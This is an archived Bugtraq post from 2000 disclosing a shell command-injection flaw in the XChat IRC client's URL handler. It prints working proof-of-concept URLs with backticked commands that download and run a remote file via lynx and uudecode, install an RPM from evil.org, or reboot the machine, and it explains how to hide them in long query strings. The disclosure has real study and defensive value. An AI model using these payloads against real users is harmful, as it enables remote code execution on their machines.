Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

XChat URL handler vulnerabilty

From: zenith parsec <zenith_parsec () THE-ASTRONAUT COM>
Date: Thu, 17 Aug 2000 11:19:40 -0000
**********************************************************************
Email was sent to zed () linux com (the author of xchat) and after over a week,
I have received no reply. So here it is... the advisory.
**********************************************************************

***************
***zen-parse*** - blinking since 1992 (or mebe earlier)
***************

X   X   CC   H  H   AA   TTTTT
 X X   C  C  H  H  A  A    T
  X    C     HHHH  AAAA    T
 X X   C  C  H  H  A  A    T
X   X   CC   H  H  A  A    T

Hole:    backticked commands embedded in URLs vulnerabilty.

***********************************
* If you are lazy, read this part *
***********************************

Just to show what i mean about the possible danger, start Netscape and enter
in xchat, (in a channel or query window) the following URL. 

http://this.should.work.com/cgi-bin/search.cgi?q='`lynx${IFS}-dump${IFS}http://homepages.ihug.co.nz/~Sneuro/thing|uudecode;./thingee`'

Right click on it, and select the Netscape (Existing) or Netscape (New Window)
option.

Wait until the URL loads.
In a shell on your machine type

tail -2 ~/.bash_profile

echo You've been hax0red
echo --zen 

(oops... should've been You\'ve been hax0red, but u get the idea ;])
Lucky it wasn't a script that was well written, and designed to
use script kiddie stuff to hack root or something, eh?
**********************************************************************
**********************************************************************

For the non-lazy and the lazy who were impressed by the quick demo...

<advisory>
**********************************************************************
 X-Chat has a feature which allows execution of code remotely 
with the permissions of the user running it. (affects at least
        versions <1.4.2, probably all versions.)
**********************************************************************

The hole is in the URL Handler section:
    Netscape (Existing)   
causes XChat to run the command
    netscape -remote 'openURL(%s)' 
where the %s is replaced by the selected URL
eg: http://homepages.ihug.co.nz/~Sneuro/
causes the command 
    netscape -remote 'openURL(http://homepages.ihug.co.nz/~Sneuro/)'
which opens that page. 
    Netscape (Run New)
causes XChat to run the command
    netscape %s  
and so on.

**************************
*       The Hole         *
**************************

Backticking and shell expansion. Imagine if someone types:

l00k @ d15 k3w1 w@r3z  5173! http://www.altavista.com/?x=`date`y='`date`&apos;


with the (Existing) or (New Window) options  and others that 
use 'openURL(%s)' type commands to start the program, you get:

    netscape -remote 'openURL(http://www.altavista.com/?x=`date`y='`date`&apos;)'

count the 's and u will see that at the 2nd `date` they are closed,
and then reopened, so that `date` isn't escaped anymore... leaving it free to 
run, which it does. 

With the (Run New) type commands (that is  command %s  with no 's around
the %s) you get:

    netscape http://www.altavista.com/?x=`date`y='`date`&apos;

which has the 1st `date` unescaped (no 's around it) and so it executes.

In real life though, its unlikely anyone would click on a URL like

http://`reboot`/'`reboot`&apos; 

though. Still, not all that useful, I hear you tell me. Well, URLs can get
pretty long. For example, a cgi-bin call to somethng can get quite long.

http://www.altavista.com/cgi-bin/query?pg=q&stype=stext&Translate=on&sc=on&q=%2bxchat+%2bbacktick+%2bexploit&stq=10

compare that to:

http://www.altavista.com/cgi-bin/query?pg=q&stype=stext&Translate=on&sc=on&q=%2bxchat+%2b`reboot`+%2bexploit&stq=10&filter='`reboot`'&user=b0dee0132&split=1

quick glance... nothing wrong with it.

well, u seem to have a limitation, in that putting spaces in doesn't 
work, nor does redirection.

well, u can put spaces in.The $IFS variable is probably set.
And who needs redirection, when u can do this:

http://www.altavista.com/?'"`rpm${IFS}-i${IFS}http://evil.org/evil.rpm`"&apos;

(For (Existing) or (New Window))

http://www.altavista.com/?"`rpm${IFS}-i${IFS}http://evil.org/evil.rpm`";

(for (Run New))
(not hidden in anyway, but it could be obfuscated like the earlier example.)
(Also only works if someone is running as root, (which is *STUPID* idea
anyway) but the 1st example should've shown you a method around this)

anyway... the possibilities are endless ;)

-- zen-parse
</advisory>

ps:
greets to:
lamagra, omega, lockdown, grue,  Mega, possem, 
some other people i can't remember, the rest of #roothat, 
and mebe even #social and umm... u, if I know u.



Send someone a cool Dynamitemail flashcard greeting!! And get rewarded.
GO AHEAD! http://cards.dynamitemail.com/index.php3?rid=fc-41

Attachment: x-chat-url-executionything.txt
Description: x-chat-url-executionything.txt

Previous By Date Next
Previous By Thread Next

Current thread: